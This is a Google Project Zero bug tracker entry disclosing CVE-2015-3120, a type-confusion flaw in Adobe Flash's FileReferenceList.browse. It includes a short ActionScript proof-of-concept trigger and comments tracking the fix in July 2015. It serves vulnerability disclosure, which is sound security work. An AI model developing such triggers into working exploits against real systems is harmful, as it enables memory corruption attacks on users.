337 - FileReferenceList.browse does not check that fileList is a ScriptObject - project-zero

Starred by 2 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Jul 2015
Cc:	project-...@google.com
Severity-Medium Finder-natashenka Deadline-90 Id-3612 CVE-2015-3120 Fixed-2015-Jul-8 Reported-2015-Apr-24 CCProjectZeroMembers Product-Flash Vendor-Adobe

FileReferenceList.browse does not check that fileList is a ScriptObject

Project Member Reported by natashenka@google.com, Apr 21 2015

Back to list

When FileReferenceList.browse attempts to add the files selected to the fileList object, it does not check that the object is an object atom. This can lead to type confusion. A minimal PoC is below:

var fileRef:FileReferenceList = new FileReferenceList();
fileRef.addListener(listener);
fileRef["fileList"] = "asdf";
fileRef.watch("fileList", func);
fileRef.browse(allTypes);

function func(){
	
	trace("in file list");
	return 7777777;
	}


A full PoC is attached. To reproduce the issue, press the button and select a file. This issue requires user interaction.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

fltype.fla
6.0 KB Download

fltype.swf
1.3 KB Download

Comment 1 by cevans@google.com, Apr 24 2015

Labels: -Reported-2015-Apr-21 Reported-2015-Apr-24

Comment 2 by cevans@google.com, Apr 25 2015

Labels: Id-3612

Comment 3 by cevans@google.com, Jul 5 2015

Labels: CVE-2015-3120

Comment 4 by cevans@google.com, Jul 9 2015

Labels: Fixed-2015-Jul-8
Status: Fixed

Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Project Member Comment 5 by natashenka@google.com, Aug 3 2015

Labels: -Restrict-View-Commit

► Sign in to add a comment